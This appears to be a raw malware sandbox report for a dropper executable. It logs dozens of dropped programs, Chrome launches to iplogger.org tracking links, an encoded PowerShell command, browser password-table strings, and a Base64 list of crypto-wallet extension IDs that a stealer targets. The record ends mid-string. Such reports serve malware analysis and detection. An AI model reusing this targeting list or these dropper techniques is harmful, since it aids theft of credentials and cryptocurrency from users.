Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8736 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8076 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8820 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AEmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WSkT8d093C.exe	Process created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8736 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8076 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8820 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1804,i,3887364631266855012,4134038574894975067,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1804,i,679818058755035571,9795757180626975896,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1816,i,10820754821841865939,13631308242641258792,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1744,i,4742277565187588249,3541242475859166172,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1764,i,7966671234020085067,5591861156680508914,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1848,i,16283781183909954720,11832735312998177263,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=1808,i,10803361475566917104,16647152247246369842,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1748,i,13339803577015116151,3936802353163471100,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

Source: C:\Users\user\Desktop\WSkT8d093C.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Users\user\Desktop\WSkT8d093C.exe

File created: C:\Users\user\AppData\Local\Temp\$inst

Jump to behavior

Source: softokn3.dll.20.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: sqlite3.dll.20.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.20.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.20.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.20.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.20.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.20.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.20.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.20.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: sqlite3.dll.20.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.20.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: F0geI.exe, 00000014.00000003.405698576.0000000003F04000.00000004.00000800.00020000.00000000.sdmp, ZmUCnzBA18yc.20.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: sqlite3.dll.20.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.20.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_0040A1FE CreateToolhelp32Snapshot,Process32First,Process32Next,

20_2_0040A1FE

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: ffnameedit.exe.1.dr, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
